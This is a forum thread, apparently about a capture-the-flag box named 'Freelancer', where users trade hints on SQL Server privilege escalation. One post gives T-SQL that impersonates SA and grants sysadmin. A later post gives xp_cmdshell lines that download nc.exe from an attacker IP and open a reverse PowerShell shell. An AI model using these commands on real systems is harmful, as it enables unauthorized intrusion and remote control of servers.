Posts: 24
Threads: 0
Joined: Apr 2024
(Jun 02, 2024, 03:19 AM)3thic4lh4ck3r Wrote: (Jun 02, 2024, 02:28 AM)maggi Wrote: any tip on the sql shell I still cant get it, it sucks but I found some useful commands
https://book.hacktricks.xyz/network-serv...sql-server
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\WINDOWS\system32> whoami
whoami
freelancer\sql_svc
what was the payoad you used cuz i tried both and yet had no luck This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Posts: 15
Threads: 0
Joined: May 2024
(Jun 02, 2024, 03:19 AM)3thic4lh4ck3r Wrote: (Jun 02, 2024, 02:28 AM)maggi Wrote: any tip on the sql shell I still cant get it, it sucks but I found some useful commands
https://book.hacktricks.xyz/network-serv...sql-server
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\WINDOWS\system32> whoami
whoami
freelancer\sql_svc
You are not able to run sp_configure 'show advanced options', '1' in SQL Terminal, because it says ('42000', '[42000] [Microsoft][ODBC Driver 17 for SQL Server][SQL Server]User does not have permission to perform this action. (15247) (SQLExecDirectW)')
Posts: 24
Threads: 0
Joined: Apr 2024
(Jun 02, 2024, 07:39 AM)hatteba Wrote: (Jun 02, 2024, 07:35 AM)3thic4lh4ck3r Wrote: Has anyone here got root yet? Stuck as mikasa with a .dmp file for quite some time now.
How did you manage to get reverse shell? u can PM to me...
hmu if you manage to get it This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Posts: 134
Threads: 13
Joined: Sep 2023
was a fun box the dump was shitty though im curious how others did it
Posts: 24
Threads: 0
Joined: Apr 2024
(Jun 02, 2024, 07:44 AM)chillywilly Wrote: was a fun box the dump was shitty though im curious how others did it
howd you do it hmu This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Posts: 57
Threads: 1
Joined: Apr 2024
For those stuck in the SQL Terminal, you can impersonate SA
https://book.hacktricks.xyz/network-serv...ther-users
Use this to make yourself sysadmin, then you have the rights to enable adv options and the shell command.
EXECUTE AS LOGIN = 'SA'
EXEC sp_addsrvrolemember 'Freelancer_webapp_user', 'sysadmin'
Posts: 55
Threads: 4
Joined: Apr 2024
any hint for getting mikasa from sql_svc?
Posts: 15
Threads: 0
Joined: May 2024
wtf there was nc.exe previously but now it says 'nc.exe' is not recognized as an internal or external command,
Posts: 219
Threads: 14
Joined: Apr 2024
guys i'm stuck in sql terminal ?? can't get cmdshell This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason:
Asking for rep is not allowed
Posts: 57
Threads: 1
Joined: Apr 2024
(Jun 02, 2024, 09:07 AM)xss_02 Wrote: (Jun 02, 2024, 07:50 AM)ritualist Wrote: For those stuck in the SQL Terminal, you can impersonate SA
https://book.hacktricks.xyz/network-serv...ther-users
Use this to make yourself sysadmin, then you have the rights to enable adv options and the shell command.
EXECUTE AS LOGIN = 'SA'
EXEC sp_addsrvrolemember 'Freelancer_webapp_user', 'sysadmin'
how to evade AV?
As mentioned previously, you can use nc
xp_cmdshell 'echo IWR http://10.10.X.X/nc.exe -OutFile %TEMP%\nc.exe | powershell -noprofile'
xp_cmdshell '%TEMP%\nc.exe 10.10.X.X 4242 -e powershell'
Can anyone share a hint on what to do after getting sql_svc shell? Tried BloodHound and some basic enumeration and pw spraying, but no success.
|
